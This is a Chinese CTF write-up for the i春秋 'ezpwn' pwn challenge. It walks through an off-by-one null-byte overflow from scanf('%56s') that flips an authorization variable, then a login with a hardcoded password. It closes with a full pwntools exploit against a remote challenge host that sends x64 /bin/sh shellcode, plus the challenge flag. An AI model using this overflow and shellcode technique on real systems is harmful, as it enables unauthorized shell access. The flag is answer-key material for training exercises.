i春秋-CTF青少年特训题库-ezpwn-wp

i春秋-ezpwn-wp

一、题目

平台地址：选手训练营 - 网络安全竞赛|网络安全竞赛培训|信息安全竞赛培训-i春秋

题目内容：

二、解题思路

老规矩查看文件属性

canary和NX都没开

使用ida64打开分析

main函数：

menu()函数：

Login()函数：

在Login()函数中得到了admin登录的密码SuperSecurePassword123!，但是v5变量被置为1，不让我们进入选项1登录"1. Login as Admin"

到目前的思路肯定就是想办法将v5覆盖为0，从而登录上admin

根据main函数的逻辑来说，我们其实只有一个选择，也就是选项"2. Send Message to Admin"

而这里

__isoc99_scanf("%56s", v4);

读取我们的输入到v4中，这里我们看栈中的布局可以发现v4距离rbp的距离是rbp-0x40,v5距离rbp的距离是rbp-0x8

而选项2的scanf刚好可以让我们输入56个字符，也就是0x40 - 0x8个字符，写入56个字符刚好到rbp-8这个地址

也就是说当输入56字节时，scanf的%56s会写入56字节，并再加上一个null字节作为结束，所以会溢出到v5的第一个字节。在内存中，v4数组之后是v5，它们的地址是连续的。这样，56字节的输入将覆盖v4数组的56字节，然后在下一个字节（v5的第一个字节）写入0。这样，v5的值由原来的1变成了0。

所以整个流程就是：

1. 发送选项2，输入56字节的数据，覆盖v5为0。

2. 发送选项1，输入正确的密码，以admin身份登录。

3. 发送选项4，触发Exec函数，获取shell。

这里exec函数无法反编译，但是看汇编可以发现是让我们输入构造的shellcode

所以在我们发送4后还需要发送一串shellcode

这里可以利用pwntools自带的shellcraft.sh()来生成，也可以使用预先生成的shellcode。

例如，标准的x64 shellcode如下：

\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05

这段shellcode对应执行execve("/bin/sh", 0, 0)

完整exp：

from pwn import *

#p = process('./pwn')
p = remote('39.106.48.123',39263)

p.sendlineafter(b'> ', b'2')
payload = b'A' * 56
p.sendlineafter(b'> ', payload)

p.sendlineafter(b'> ', b'1')
p.sendlineafter(b'Password: ', b'SuperSecurePassword123!')

p.sendlineafter(b'> ', b'4')

#shellcode = asm(shellcraft.sh())
shellcode = b"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05"
p.sendlineafter(b'Shellcode: ', shellcode)
p.interactive()

三、flag

flag{f151995f-b491-4cbd-ae7c-8404a6ba4fe6}